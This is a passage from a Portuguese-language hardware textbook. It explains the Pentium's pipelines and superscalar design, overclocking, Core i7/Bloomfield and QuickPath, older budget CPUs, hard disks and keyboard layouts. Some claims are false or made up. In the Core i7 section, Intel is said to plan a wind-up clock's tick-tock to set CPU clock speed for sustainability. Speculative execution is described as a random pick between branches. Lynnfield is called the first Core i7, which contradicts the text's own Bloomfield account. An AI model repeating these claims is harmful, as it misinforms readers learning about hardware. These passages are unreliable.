do. Foram alteradas algumas das instruções, que passaram a ser
executadas muito mais rapidamente e, como o processador principal,
o coprocessador do Pentium também passou a utilizar um pipeline
para aumentar a velocidade de execução das instruções.

Somadas com as brutais melhorias na arquitetura, o coprocessador


do Pentium tornou-se cerca de 5 vezes mais rápido do que o utilizado
no 486, tornando o processador muito mais rápido em aplicativos que
demandem um grande número de cálculos.

204
Arquitetura Superescalar

Mais um aperfeiçoamento do Pentium e um dos principais motivos de


seu maior desempenho, é a adoção de uma arquitetura superescalar.

Internamente, o Pentium trabalha como dois processadores de 32 bits


distintos (chamados de canaleta U e canaleta V), sendo capaz de
processar duas instruções por ciclo de clock (uma em cada proces-
sador). Cada processador possui acesso total ao cache, à memória
RAM, e aos demais componentes do micro. Foi incluída também,
uma unidade de controle, com a função de comandar o funcionamen-
to dos dois processadores e dividir as tarefas entre eles.

Teoricamente, o uso de dois processadores distintos dobraria o de-


sempenho do Pentium, já que ao invés de uma, poderiam ser execu-
tadas duas instruções por ciclo de clock. Mas, na prática existem
algumas limitações.

Se por exemplo, um programa ordena que o processador some 4


números, X + Y + W + K, o processador poderia no primeiro ciclo de
clock usar a canaleta U para somar X e Y e a canaleta V para somar
W, mas no segundo ciclo, haveria apenas mais um cálculo para ser
executado, o resultado das duas somas. Neste caso, apenas uma
das canaletas poderia ser usada; a segunda ficaria ociosa. No final
das contas, houve um ganho de 33%, já que ao invés do processador
demorar 3 ciclos para executar o cálculo, demorou apenas 2.

Caso a continuação do cálculo dependesse da conclusão do cálculo


anterior, como em “(X + Y) x 3”, a segunda canaleta novamente não

205
poderia ser usada, pois o processador teria primeiro que somar X e Y
para depois multiplicar o resultado por 3. Neste caso, não haveria
ganho algum, pois o processador demoraria os mesmos dois ciclos
que seriam necessários com apenas uma canalização.

Em média, a segunda canalização permite um desempenho 30 ou


40% superior ao desempenho obtido com apenas uma canalização.
Caso o software seja alterado e otimizado para rodar em um proces-
sador com duas canalizações, ordenando as instruções de modo a
deixar a segunda canaleta ocupada durante a maior parte do tempo,
podemos conseguir mais 10 ou 15% de desempenho, chegando a
algo entre 40 e 50%, mas, jamais será possível conseguir o dobro de
desempenho.

Isto pode ser notado por exemplo ao recompilar o kernel do Linux. É


possível orientar o utilitário a otimizar o código para qualquer proces-
sador, de um 486 a um Pentium III. Esta otimização permite que o
Linux utilize todos os recursos do processador, obtendo um desem-
penho bastante superior.

Otimizar um programa para rodar em um processador Pentium, não o


torna incompatível com processadores com apenas uma canalização
(como o 486), nem torna seu desempenho menor nestes processado-
res, já que as mesmas instruções serão executadas, apenas em or-
dem diferente.

Execução Especulativa

Se o processador tivesse que processar uma instrução de tomada de


decisão, como em “Se X > 0 então Y = 30, senão Y = 20”, enquanto a
primeira canaleta do processador verifica se X é maior ou menor que
0, a segunda ao invés de ficar ociosa, pode executar uma das duas
opções seguintes (atribuir o valor 30 ou atribuir o valor 20 a Y). No
próximo ciclo, quando a primeira canaleta tivesse terminado de pro-
cessar sua instrução, teríamos 50% de chance da segunda canaleta
ter adivinhado qual seria a instrução seguinte e já tê-la executado. O
nome “execução especulativa” foi dado por que a segunda canaleta
escolhe aleatoriamente a instrução a executar, entre as duas possí-
veis.

206
Acesso mais rápido à Memória

O Pentium é capaz de acessar a memória usando palavras binárias


de 64 bits, o dobro do 486, que a acessa a 32 bits. Este recurso per-
mite que sejam lidos 8 bytes por ciclo, ao invés de apenas 4, dobran-
do a velocidade de acesso à memória. Isto diminuiu bastante o antigo
problema de lentidão das memórias, mas apenas provisoriamente,
pois logo surgiram processadores Pentium utilizando multiplicadores
de clock cada vez mais altos.

Como a maioria das placas para processadores Pentium utiliza módu-


los de memória de 72 vias, que são módulos de 32 bits, é preciso
usa-los em pares. O processador acessa cada dupla como se fosse
um único módulo, chegando aos 64 bits necessários.

Mesmo com a capacidade de acessar a memória a 64 bits e sendo


composto internamente por dois processadores de 32 bits, o Pentium
continua sendo um processador de 32 bits. Estes novos recursos
servem apenas para melhorar o desempenho do processador.

Multiprocessamento

Visando o mercado de Workstations (máquinas muito rápidas, desti-


nadas a aplicações pesadas como processamento de imagens 3D ou
vídeo) e servidores de rede, a Intel incluiu no Pentium o recurso de
multiprocessamento simétrico, que permite o uso de dois processado-
res na mesma placa mãe. Neste caso, é preciso adquirir uma placa
mãe especial, com encaixe para dois processadores e um chipset
com suporte ao multiprocessamento.

Como a divisão das tarefas entre os dois processadores não é feita


automaticamente pelo chipset, é preciso que o sistema operacional
seja capaz de reconhecer os dois processadores e acessá-los indivi-
dualmente, dividindo as tarefas entre eles da melhor maneira possí-
vel.

Caso o sistema operacional não ofereça suporte ao multiprocessa-


mento, como é o caso do Windows 95 e do Windows 98, apenas um

207
dos processadores será usado pelo sistema, ficando o outro inativo.
Neste caso, será como se tivéssemos apenas um processador insta-
lado. A maioria dos sistemas operacionais, incluindo o Windows NT,
2000 e XP, Linux e a maioria das versões do Unix suportam multipro-
cessamento, as exceções mais notáveis ficam por conta do Windows
95,98 e ME.

Apesar de, pela lógica, o desempenho dobrar com dois processado-


res trabalhando em paralelo, na prática o ganho dificilmente passa de
40 ou 60%, pois dificilmente será possível organizar a execução das
tarefas de modo a deixar ambos os processadores ocupados todo o
tempo, assim como é difícil manter as duas canaletas do Pentium
cheias 100% do tempo.

Até pouco tempo atrás, o recurso de multiprocessamento foi exclusi-


vidade dos processadores Intel. Tanto o Pentium, quanto o MMX, o
Pentium II e o Pentium III suportam o uso de até dois processadores
simultaneamente, enquanto o Xeon suporta o uso de até quatro pro-
cessadores (8 com a adição de um circuito especial na placa mãe).
Com exceção do Athlon MP, todos os demais processadores da AMD
e Cyrix não suportam multiprocessamento, o que não chega a ser
uma grande desvantagem para um usuário doméstico, já que fora do
ramo dos servidores de alto desempenho, este recurso raramente é
usado.

Clock e Overclock

Ao contrário do que muitos pensam, velocidade de operação dos


processadores não é fixa, mas sim determinada pela placa mãe.

Na placa mãe temos um pequeno cristal de Quartzo, chamado gera-


dor de clock, que vibra alguns milhões de vezes por segundo, com
uma precisão quase absoluta. As vibrações deste cristal são usadas
para sincronizar os ciclos da placa mãe, que sabe que a cada vibra-
ção do cristal deve gerar um certo número de ciclos de processamen-
to.

É mais ou menos como um farol, que abre e fecha algumas vezes por
minuto. Quando o farol está fechado, o trânsito fica parado, voltando

208
a fluir quando a farol abre. Um pulso de clock é justamente a abertura
do farol, um “já!” que faz todos os periféricos trabalharem simultane-
amente e de forma sincronizada. O funcionamento de todos os perifé-
ricos, da placa de vídeo ao disco rígido, é coordenado por este reló-
gio.

O processador não possui um gerador de clock, e por isso trabalha


usando o sinal recebido da placa mãe. Num Pentium MMX de 200
MHz, por exemplo, a placa mãe funciona a 66 MHz, e o multiplicador
é 3x, o que significa que para cada ciclo da placa mãe, o processador
gerará 3 ciclos.

Justamente por estar limitada à frequência indicada pela placa mãe, a


frequência do processador não é fixa; pode ser maior ou menor do
que o especificado, dependendo de como a placa mãe estiver confi-
gurada.

Como as placas mãe atuais, para manter compatibilidade com vários


processadores podem operar a várias frequências diferentes, é pos-
sível fazer o processador trabalhar mais rápido simplesmente configu-
rando a placa mãe para trabalhar a uma frequência maior. Esta técni-
ca é chamada de Overclock, uma gíria que significa “acima do clock”
numa tradução livre.

Um Pentium 120 por exemplo, usa bus 60 MHz e multiplicador de 2x.


Se configurássemos a placa mãe para trabalhar a 66 MHz, mantendo
o multiplicador em 2x, o processador passaria a trabalhar a 133 MHz.
Se a frequência da placa mãe fosse aumentada para 75 MHz, o pro-
cessador funcionaria a 150 MHz.

Em muitos casos, o processador também aceita um multiplicador


maior. Um AMD K6 de 266 MHz por exemplo, trabalha com a placa
mãe funcionando a 66 MHz e usando multiplicador de 4x. Se aumen-
tássemos o multiplicador para 4.5x, mantendo a placa mãe funcio-
nando a 66 MHz, faríamos o processador funcionar a 300 MHz.

A performance de um processador trabalhando em overclock é idênti-


ca à de um processador “normal” funcionando a essa velocidade. Um

209
Pentium 120 overclocado para 133 MHz por exemplo, apresenta exa-
tamente a mesma performance de um Pentium 133 “de verdade”.

Quando um fabricante desenvolve um projeto de processador, testa-o


a várias frequências diferentes, a fim de determinar sua frequência
ideal de operação. Geralmente, os fabricantes adotam uma certa
margem de segurança, vendendo o processador com uma frequência
ligeiramente inferior à frequência máxima. É justamente esta margem
de segurança que permite o overclock; estaríamos então simples-
mente fazendo o processador funcionar na sua frequência máxima.
Esta margem muda de fabricante para fabricante e de processador
para processador. Por isso, alguns processadores aceitam overclocks
maiores que outros. Existem casos de processadores que aceitam
trabalhar sem problemas a uma frequência 50% maior que a original,
assim como existem casos de processadores que apresentam insta-
bilidade operando a uma frequência apenas 10% maior que a original.

Obviamente, o overclock também traz algumas desvantagens. Fa-


zendo o processador trabalhar a uma frequência maior do que a ide-
al, podemos ter problemas de travamentos, superaquecimento e
sempre haverá alguma diminuição de sua vida útil.

Core i (3, 5 e 7)

Intel Core i7 é uma família de processadores Intel para desktop e


notebooks x86-64 (32 e 64 bits). É o primeiro processador lançado
que utiliza a microarquitetura Intel Nehalem que é o sucessor dos
processadores Intel Core 2. Atualmente, existem ao todo três mode-
los de processadores de quatro núcleos. Os três modelos atuais e
futuros serão dos modelos Quad-core. O i7 se aplica a família de
processadores Bloomfield. O nome continua com o uso da marca
Core da Intel. Foi lançado oficialmente em 17 de novembro de 2008 e
é fabricado no Arizona, Novo México e Oregon, embora a fábrica
destes já tenham se adaptado para a próxima geração de processa-
dores de 32nm. Este processador possui 8 MB de cache inteligente, e
trabalha com memórias de até 1066 MHZ em modo Triple Channel.

Bloomfield é o codinome dos processadores high-end Intel da sé-


rie Xeon 35xx e Core i7-9xx. Possuem configurações idênticas, subs-

210
tituindo os processadores Yorkfield. O núcleo Bloomfield está intima-
mente relacionado com o processador dual-Gainestown, que tem o
mesmo valor CPUID 0106Ax (família 6, modelo 26). Já a família
Lynnfield e Clarksfield móveis são processadores quad-core com
base na mesma arquitetura Intel Nehalem de 45 nm, porém sendo
destinados ao mercado mid-end. Estes não possuem a tecnolo-
gia QPI (Quick Path Interconnect), mas sim a tecnologia DMI (Direct
Media Interface).

Criado para substituir o Front Side Bus. Funciona como uma interco-
nexão de alta velocidade ponto a ponto. Cada processador possui
seu controlador de memória (memória dedicada) e memória cache,
fazendo com que os processadores comuniquem-se diretamente com
o controlador de entrada e saída. Os processadores podem acessar
diretamente a cache do outro, devido às interconexões entre eles,
possibilitando também o fluxo de dados em ambas as direções ao
mesmo tempo.

Chama-se de link a conexão entre dois dispositivos QuickPath, com-


posta por um conjunto de sinais unidirecionais transmitidos por um
dispositivo e recebidos por outro.
As funções do QuickPath são agrupadas em quatro camadas:

Camada Física: controle de transferência de dados relacionados à


sinais elétricos. Inclui problemas com envio e recebimento de bits.

Camada de Comunicação: tratamento de erros ocorridos durante a


transferência de dados da camada física para ela mesma.

Camada de Roteamento: assegura a ida apropriada dos dados ao


seu destino. Dados com destino dentro do próprio dispositivo são
enviados para a camada de protocolo.

Camada de Protocolo: manter coerência de cache; controlar fun-


ções de sistema.

Algumas melhorias:
Aumento de desempenho;
Aumento de largura de banda;

211
Baixo custo;
Escalável;
Eficiente consumo de energia;
Suporte para novas capacidades.

A Intel prevê lançamento de uma nova arquitetura para seus proces-


sadores a cada dois anos. "Tique" faz referência à criação de novas
técnicas para a construção de transistores menores e, a utilização
máxima da eficiência e velocidade do processador. Além do mais,
com o advento da tecnologia multicore, a intel já esta prevendo a
melhoria da tecnologia, e em homenagem ao tique taque ela vai colo-
car um processador que usa o tique taque do relógio a corda para
ditar o clock da CPU, desta maneira ele além de economizar energia,
ainda vai estar incentivando o desenvolvimento sustentável.

O processo de overclock da arquitetura Bloomfield é semelhante ao


da arquitetura AMD, devido à HCM.

O overclock será possível com a série 900 e uma placa mãe equipa-
da com o chipset X58. No início de outubro de 2008, surgiram relatos
de que não será possível usar o "desempenho" DDR3 DIMMs que
exigem tensões superiores a 1.65V, pois o controlador de memória
integrado no âmbito da Core i7 será danificado.

O Bloomfield possui três canais de memória. A largura de banda do


canal pode ser selecionada pela configuração de memória do multi-
plicador. No entanto, em valores de referência inicial, quando a taxa
de clock está definida em um limite superior (1333 a 965XE), o pro-
cessador vai acessar apenas dois canais de memória simultanea-
mente.

A 965XE tem maior taxa de transferência de memória com 3xDDR3-


1333 do que com 3xDDR3-1600, e 2xDDR3-1600 possui uma taxa de
transferência quase igual ao 3xDDR3-1333.

O Core i7 950 e o Core i7 975 Extreme Edition foram introduzidos em


março de 2009 com preços semelhantes aos preços do 940 e 965
Extreme Edition, respectivamente, mas com melhor desempenho em
cada caso.

212
A Intel tem agendada a interrupção do 940 e 965XE para Q3 2009.
Também anunciou a interrupção de outros processadores mais anti-
gos, ao mesmo tempo.

Lynnfield é o primeiro processador vendido sobre a marca Core i7, e


ao mesmo tempo, sendo vendido como Core i5.

Ao contrário de Bloomfield, não tem uma interface QPI mas se conec-


ta diretamente à ponte-sul e outros dispositivos que utilizam o Direct
Media Interface PCI Express ligados no soquete 1156. O Core i7 ba-
seado no Lynnfield possui HT (Hyper-Threading), que é desativado
em processadores Core i5 Lynnfield.

Chamada Sandy Bridge, é a próxima tendência a ser lançada. Em


seu próximo "Tique" haverá a mudança da arquitetura Nehalem de 45
nanômetros para 32 nanômetros. Tal Core i7 é seguido pelos Core i7
de Segunda geração, que chegam a ser 30% mais rápidos.

Outros processadores

Além dos processadores “principais” que vimos até agora, existiram


alguns modelos lançados como processadores de baixo custo, alter-
nativa de upgrade para quem tinha um processador antigo e não que-
ria gastar muito.

213
486DLC e 486SLC

Estes dois processadores foram a tentativa da Cyrix de entrar no


mercado de processadores de baixo custo, oferecendo uma opção
barata de upgrade para usuários de micros 386 e também uma opção
de processador para micros de baixo custo, especialmente micros de
menos de 1.000 dólares.

Estes processadores são basicamente processadores 386 (respecti-


vamente o DX e o SX), que incorporam um pequeno cache L1 de
apenas 1 KB.

O cache não fazia milagres, mas já era o suficiente para aumentar um


pouco o desempenho do processador, o que somado ao baixo preço
de venda, foi suficiente para vários usuários investirem no upgrade, já
que os 486DLC e SLC eram totalmente compatíveis com as placas
para micros 386.

Vale lembrar que, como o 386 padrão, estes processadores não pos-
suem coprocessador aritmético, podendo ser acoplados a eles o
387DCL ou o 387SLC, que deviam ser comprados separadamente.

Sob licença da Cyrix, a Texas Instruments desenvolveu versões pró-


prias do 486DLC e SLC, preservando a mesma arquitetura, mas au-
mentando a quantidade de cache L1 para 8KB.

214
AMD 5x86

No início, a AMD produzia clones de processadores Intel, utilizando


os projetos desenvolvidos pela Intel e pagando royalties em troca.
Porém, devido a várias divergências, a aliança acabou sendo desfeita
e a AMD passou a batalhar seus próprios projetos de processadores.
Apesar de, durante muito tempo, a AMD ter tido que se contentar com
um distante segundo lugar, produzindo basicamente processadores
de baixo custo, atualmente ela vem competindo diretamente com a
Intel também no ramo de processadores de alto desempenho com
seu Athlon, conseguindo na maioria das vezes manter preços mais
baixos que a concorrente.

Mas, voltando à nossa aula de história, depois que a Intel lançou o


486DX4-100, abandonou o desenvolvimento de processadores 486
para se dedicar somente ao desenvolvimento do Pentium.

Com a intenção de apresentar um processador que possuísse um


desempenho semelhante a um Pentium low end (os modelos mais
lentos e baratos), mas que ao mesmo tempo tivesse um preço com-
petitivo, a AMD continuou o desenvolvimento do seu processador
486, lançando uma versão de 120 MHz (que opera usando barramen-
to de 40 MHz e multiplicador de 3x),e logo em seguida também uma
versão de 133 MHz.

Por questões de Marketing, a AMD batizou este 486 de 133 MHz de


“AMD 5x86” o que confundiu alguns usuários, que pensaram tratar-se
de um processador semelhante ao Pentium. O AMD 5x86 utiliza pla-
cas mãe para 486, necessita apenas que a placa seja capaz de sina-
lizar o multiplicador de 4x. O clock fica em 33 MHz, totalizando seus
133 MHz.

Como o AMD 5x86 não passa de um 486 funcionando a 133 MHz,


seu desempenho é pouco menos de 33% superior a um 486DX4-100,
sendo mais ou menos equivalente ao de um Pentium de 75 MHz.
Aliás, outra medida de marketing tomada pela AMD na época, foi criar
um índice Pr, ou “Pentium Rating”, comparando o desempenho do
5x86 ao do Pentium. O 5x86 de 133 MHz recebeu o índice Pr 75,

215
indicando possuir um desempenho semelhante ao apresentado por
um Pentium de 75 MHz.

A AMD conseguiu fazer um razoável sucesso com este processador,


já que além de ser sido muito usado em micros de baixo custo, o
5x86 passou a ser uma alternativa barata de upgrade para usuários
de micros 486 com processadores mais lentos.

Cyrix Cx5x86

Além de desenvolver projetos de processadores 486, que foram fabri-


cados pela Texas Instruments, a Cyrix lançou um processador que
mistura recursos do 486 e do Pentium, oferecendo um desempenho
bastante superior a um 486 padrão.

Este processador foi batizado como Cx5x86, e apresenta um cache


L1 de 16 KB, além de algumas outras melhorias que tornam seu de-
sempenho cerca de 35% superior ao de um 486 do mesmo clock. A
versão de 100 MHz do Cx5x86 possui um desempenho equivalente
ao 5x86 de 133 MHz da AMD e ao Pentium 75, enquanto a versão de
120 MHz rivaliza em desempenho com um Pentium 90.

Como o 5x86 da AMD, Cx5x86 é totalmente compatível com as pla-


cas mãe para 486, bastando configurar a placa com multiplicador de
3x e bus de 33 MHz para instalar a versão de 100 MHz e, 3x 40 MHz
para utilizar a versão de 120 MHz.

216
AMD K5

Depois de muitos atrasos, a AMD finalmente conseguiu lançar um


processador que pudesse concorrer diretamente com o Pentium. O
K5, porém, não chegou a tornar-se muito popular devido ao seu lan-
çamento atrasado. Quando finalmente saíram as versões Pr 120 e Pr
133 do K5, a Intel já havia lançado as versões de 166 e 200 MHz do
Pentium, ficando difícil a concorrência. Ao invés de simplesmente
tentar copiar o projeto da Intel, a AMD optou por desenvolver um pro-
cessador completamente novo, tecnicamente superior ao Pentium.

O K5 também utiliza uma arquitetura superescalar, mas ao invés de


duas, possui quatro canalizações. O cache L1 também foi ampliado,
passando a ser de 24 KB, dividido em dois blocos, um de 16 KB para
instruções e outro de 8 KB para dados.

O coprocessador aritmético porém não foi muito melhorado, apresen-


tando um desempenho quase50% inferior ao apresentado pelo co-
processador do Pentium, devido principalmente à ausência de Pipeli-
ne. Este acabou sendo o calcanhar de Aquiles do K5, que a AMD
sempre fez o possível para tentar esconder. Mas, como na maioria
das aplicações o K5 era bem mais rápido que o Pentium, a AMD op-
tou novamente por vender seu processador segundo um índice Pr,
que compara seu desempenho com o dos processadores Pentium:

K5-Pr 120 90 MHz (1.5x 60 MHz)


K5-Pr 133 100 MHz (1.5x 66 MHz)

217
K5-Pr 166 116 MHz (1.75x 66 MHz)

Pentium Overdrive

Como fez com os antigos 386 SX, a Intel lançou (ou pelo menos ten-
tou, pois este processador nunca chegou a ser muito vendido) tam-
bém um Pentium “low cost”. Este processador, apesar de internamen-
te ter um funcionamento idêntico a um Pentium, utiliza placas mãe
para processadores 486, sendo por isso chamando de Overdrive.

A Intel lançou o Overdrive em versões de 63 MHz (25 MHz x 2.5) e 83


MHz (33 MHz x 2.5) mas, por utilizarem placas de 486, que operam a
frequências muito mais baixas e acessam a memória a apenas 32
bits, estes processadores perdem feio em performance se compara-
dos com um Pentium “de verdade”. O Overdrive de 63 MHz apresenta
performance idêntica ao 486DX4-100, enquanto o de 83 MHz empata
com o 5x86 de 133 MHz da AMD.

Além da baixa performance, o Overdrive era extremamente caro (por


isso usei o low cost entre aspas no parágrafo anterior), e acabou
sendo uma péssima opção de compra. Em termos de custo beneficio,
o 5x86 da AMD foi uma opção muito melhor.

Mesmo após este primeiro fracasso, a Intel continuou tentando lançar


sucessivamente vários processadores Overdrive, entre eles uma ver-
são do MMX que funciona em placas soquete 7 antigas e uma versão
do Pentium II que funciona em placas mãe para Pentium Pro. Apesar
da propaganda feita por alguns “especialistas” nenhum destes mode-
los de Overdrive foi uma opção de compra que sequer merecesse ser
considerada, pois devido à baixa procura e consequentemente à bai-

218
xa produção, sempre custaram muito mais caro do que processado-
res equivalentes.

A única vantagem de se utilizar um processador Overdrive seria con-


tinuar utilizando a mesma placa mãe, trocando apenas o processa-
dor. Porém, na maioria vezes, por causa da baixa produção o proces-
sador Overdrive custa mais caro que um processador normal mais
uma placa mãe para ele, tornando-se uma opção incoerente de
upgrade.

É bem possível que no futuro sejam lançados outros modelos de pro-


cessadores Overdrive, mas não espere ver boas opções. Adianta
muito pouco trocar apenas o processador, mantendo a mesma velha
e ultrapassada placa mãe, a mesma quantidade de memória de RAM,
o mesmo velho e lento disco rígido etc. e vale menos à pena ainda
pagar caro por isso. Seria como comprar uma Brasília e trocar o mo-
tor, você vai continuar com o mesmo carro velho. Na maioria das
vezes, é mais sensato gastar em mais memória RAM, num disco
rígido maior e mais rápido, ou numa placa 3D, caso o micro seja utili-
zado para jogos.

Um tal de 186

O 8086 foi o pai do 8088, que equipou os primeiros PCs. Depois vie-
ram os processadores 286, que também conhecemos bem. Mas,
entre as duas gerações, existiu um modelo intermediário, pouco co-
nhecido, mas igualmente importante. O 80186 é uma evolução do
8086, que trouxe algumas instruções novas e um sistema de tolerân-
cia à falhas. Apesar de não ter sido usado como processador em
micros PC, o 80186 tornou-se um componente bastante popular,
sendo usado em controladores de HDs, controladores de interrupção
entre vários outros periféricos. Nestas aplicações, o 80186 continua
em uso até hoje.

Winchester ou HD (Hard Disk)

Um winchester, ou WD, ou HD, ou disco rígido como também é co-


nhecido, é composto fisicamente de discos de alumínio, revestidos
com um produto químico magnético semelhante ao dos disquetes

219
flexíveis, empilhados um sobre o outro. Entre eles, em espaços bas-
tante reduzidos, movimentam-se as cabeças de leitura e gravação,
cujo vai-e-vem é controlado por um motor chamado de motor-de-
passo, semelhante ao motor-de-passo que controla as cabeças de
leitura e gravação das unidades de disquete.

Estas unidades de HD (Hard Disk) não devem em hipótese alguma


serem abertas, basta uma pequena partícula de pó ficar num disco e
isto causará uma ranhura irrecuperável, inutilizando o HD (Hard Disk)
definitivamente.

O HD (Hard Disk) já possui um filtro visível em sua parte exterior, que


filtra o ar que circula em seu interior.

Imagine um avião boing voando a 1,5 m (um metro e meio) de altura


do solo. Traduza isso para as dimensões de um HD (Hard Disk), e
você vai concluir que a distância entre as cabeças de leitura e grava-
ção e os discos é tão pequena, que nem a luz conseguirá passar,
porque é espessa demais.

Um HD (Hard Disk) ou um disquete são compostos por partes físicas


e partes lógicas. Partes físicas (hardware) são as partes mecânicas e
eletrônicas, internas ou externas, em resumo, o que for palpável ou
visível. Partes lógicas são as criadas via software, magneticamente, e
sem dúvida invisíveis.

Sobre teclados

Quando compramos um computador, a última coisa que notamos é o


teclado. Apesar de ser uma peça muito importante, não só porque é
através dela que interagimos com a máquina na maior parte do tem-
po, a maioria dos usuários não dá a devida atenção ao periférico e,
na pior das hipóteses, acaba tendo problemas e precisando comprar
outro, ou mesmo o uso incorreto acaba acarretando problemas de
saúde.

Neste artigo, mostraremos como o teclado funciona, os diferentes


padrões existentes, além de dicas de produtos, ergonomia e coman-
dos para os usuários do Windows.

220
Para que serve?
Pois bem, a função do teclado é óbvia para a maioria dos usuários,
mas digitar texto não é a única tarefa que o teclado pode executar.
Suas teclas podem capturar imagens, serem usadas para navegar na
internet ou trabalhar com as janelas, no caso de um problema com o
mouse, executar comandos em jogos, etc. A resposta certa para a
pergunta do subtítulo é: “o teclado serve como um dispositivo de en-
trada, isto é, para o envio de dados pelo usuário, que serão interpre-
tados pelo computador e mostrados na tela”.

Como funciona?
Existem diferentes tipos de teclado, cada um com funcionamento
interno diferente. Por isso, mostraremos somente como os teclados
comuns trabalham e daremos algumas curiosidades sobre os demais.

Apesar do que muitos pensam, o teclado não é um periférico simples,


nem burro. Ele possui um microprocessador em seu interior, que in-
terpreta a forma como as teclas são pressionadas. É o chip do tecla-
do que interpreta que quando você apertar a tecla “O” seja impressa
na tela a letra correspondente; da mesma forma, ele precisa entender
a diferença entre “O” e a combinação “CTRL + O” (que no Word abre
um novo arquivo).

É possível que você já tenha visto um teclado aberto — se não viu,


NÃO abra o seu, pois seria como desmontar um relógio antigo, na
hora de remontar, sobrarão peças e ele não funcionará como deveria.

221
Você poderia pensar que um teclado de computador tem funciona-
mento semelhante ao das teclas numéricas de um celular, mas há
uma grande diferença, pois o telefone não é capaz de interpretar
combinações de teclas (os celulares top de linha já podem).

Dentro da parte plástica do seu teclado, existem “folhas” como as da


imagem acima. O conjunto destas folhas é chamado de “matriz do
teclado”. Dependendo do modelo, podem haver mais de duas, mas
elas sempre terão aparência semelhante às folhas da imagem. Al-
guns fabricantes colocam uma folha de plástico entre as folhas para
separá-las e evitar contado entre os circuitos de cada uma, outras
empresas utilizam outros materiais, e até o mesmo utilizado para as
folhas que contêm os circuitos.

Lembra das aulas de matemática do ensino médio? O funcionamento


da matriz do teclado é fundamentado nos conhecimentos de matrizes
matemáticas.

Quando você pressiona uma tecla, uma pequena corrente elétrica


passa pelo circuito que está logo abaixo. O processador do teclado
percebe o acontecido, verifica a posição do circuito em sua matriz e a
letra ou comando correspondente, que consta em sua memória. Por
exemplo, se você apertar a tecla que possui a bandeira do Windows,
o chip perceberá que circulou energia no local e enviará para o PC o
comando correspondente, que é a de abrir o Menu Iniciar. Ou seja,
assim como qualquer equipamento eletrônico, o teclado interpreta

222
impulsos elétricos e suas interrupções para gerar comandos ou ca-
racteres na tela do seu monitor.

Padrões de teclado
Layout
Você tem ideia do motivo que levou os fabricantes de teclado a colo-
carem as teclas na posição que conhecemos hoje? Por que será que
a primeira letra é o Q, seguida pelo W, depois o E, até chegar à últi-
ma, que é o M? A resposta é simples: este padrão — que é chamado
de QWERTY justamente por serem as 6 primeiras letras da sequên-
cia — foi adotado porque já era utilizado pelas máquinas de escrever.
O que foi feito foi simplesmente adaptar o padrão ao teclado dos
computadores. Entretanto, existem diversos outros tipos de disposi-
ção de teclas.

As máquinas de escrever trabalhavam com “martelos” de metal, que


batiam no papel para imprimir as letras. Sabendo quais teclas eram
mais usadas, elas foram dispostas de tal maneira que os pequenos
martelos não acabassem batendo um no outro ou travando em algum
lugar no percurso do repouso até o papel, devido à velocidade com
que as teclas eram pressionadas. Assim, o padrão QWERTY foi ado-
tado porque ele tornava a datilografia mais lenta (estranho, não?) e,
com o surgimento do computador, foi também transportado para os
teclados modernos, facilitando assim a adaptação dos usuários.

Apesar de o padrão QWERTY ser o mais utilizado, ele não é o me-


lhor. Na verdade ele é extremamente desconfortável se comparado a
outros, pois exige um excesso de movimento dos dedos para ser
usado. Existem outros padrões como o XPERT, que podem ser alter-
nativas melhores, mais confortáveis e que talvez até aumentem a
velocidade com que o usuário digita. Outro padrão é o Dvorak (que

223
leva esse nome por causa de seu inventor). Projetado por August
Dvorak, em 1920, esse tipo de disposição de teclas foi idealizado
para facilitar a digitação, pois mantém as vogais em um lado e as
consoantes em outro.

O teclado Dvorak é até recomendado para quem digita em inglês,


pois ele faz com que o usuário precise mexer menos as mãos e, por
consequência, se esforce muito menos para digitar. Além disso, exis-
tem dois outros padrões criados para quem precisa digitar utilizando
somente uma mão (um padrão para a mão esquerda e um para a
direita).

Conexão
A maioria esmagadora dos teclados que acompanhavam os compu-
tadores na década de 1990 utilizava o conector “DIN”. Com o tempo,
os fabricantes começaram a lançar teclados que utilizavam o conec-
tor “mini-DIN” (ou PS/2), e foram inicialmente produzidos pela IBM e
acabaram se tornando o padrão usado até hoje. Com a evolução do
equipamento, adição de teclas multimídia e comandos adicionais, os
novos teclados já estão sendo fabricados com um conector USB, que
torna ainda mais fácil a conexão, devido à grande aceitação do pa-
drão em todo o mundo. Porém, a maioria dos computadores ainda
vem com as entradas PS/2 tanto para mouse quanto para teclado,
mas elas devem cair em desuso em pouco tempo.

DIN quer dizer Deutsche Industrie Norm, que é o nome de uma orga-
nização alemã de padronização.

Teclados legais
Veja agora alguns teclados que podem fazer você ficar horas admi-
rando uma vitrine. Alguns têm a proposta de melhorar a ergonomia,

224
outros de facilitar e melhorar a interação do usuário com o PC. Inde-
pendente do modelo e fabricante, os teclados que mostraremos são
objeto de desejo de muitos usuários (alguns nem estão disponíveis
para venda no Brasil.

A Econo-Keys é uma fabricante norte-americana de teclados fora do


comum. Eles costumam sempre ter funções extras se comparados
aos teclados normais. O modelo EK-76-TP é um prático teclado, feito
de borracha, com conexão USB e compatível com Windows e Linux.
Você deve ter notado pela foto que no verso do periférico ainda há
um mouse no estilo touchpad. Quem precisa de praticidade vai querer
ter um.

O teclado abaixo parece bizarro, mas faz os olhos de muitos gamers


e artistas gráficos brilharem, pois suas teclas são totalmente configu-
ráveis não só na função das teclas, mas na posição em que ocupam.
Você pode literalmente colocar as teclas onde quiser e atribuir qual-
quer função a elas.

225
Que tal usar um teclado que possua teclas em ordem alfabética, ao
invés do padrão QWERTY? Pois um fabricante de periféricos pensou
em você e lançou o Hunt n’ Peck, um teclado que pode ser usado de
ambas as formas: no padrão normal, ou com as letras em ordem al-
fabética, para que você não tenha tanta dificuldade na hora de digitar.
É possível utilizar uma tecla de função para alternar entre o padrão
normal e o destinado a dedógrafos.

A Apple é a campeã quando falamos em design de computadores e


periféricos. Usuários de MAC podem ter um teclado com um design
minimalista, mas extremamente confortável. Ele possui opções com
ou sem fio (USB ou Bluetooth) e está disponível no Brasil. Usuários
de PC e Windows chorem à vontade, pois esse modelo não existe
para máquinas que não sejam MACs.

O nome do teclado é parecido com o de um Transformer, e não é à


toa. O Optimus Maximus é um teclado aparentemente normal, mas
olhando mais de perto, você poderá perceber que ele é totalmente
personalizável, além de ser lindo. Suas teclas possuem OLEDs (pe-
quenas luzes) que acendem com as letras que representam. Mas não
fica por aí, pois as teclas podem ser configuradas para mostrarem
símbolos de ferramentas, comandos, programas ou mesmo imagens
feitas por você.

226
E você, o que acha?
Será que, em português, poderíamos ter um teclado que atendesse
melhor as nossas necessidades e causasse menos dores nas mãos
de quem utiliza o equipamento por longas horas seguidas? Por que
será que nenhum fabricante de teclados do Brasil propôs até hoje a
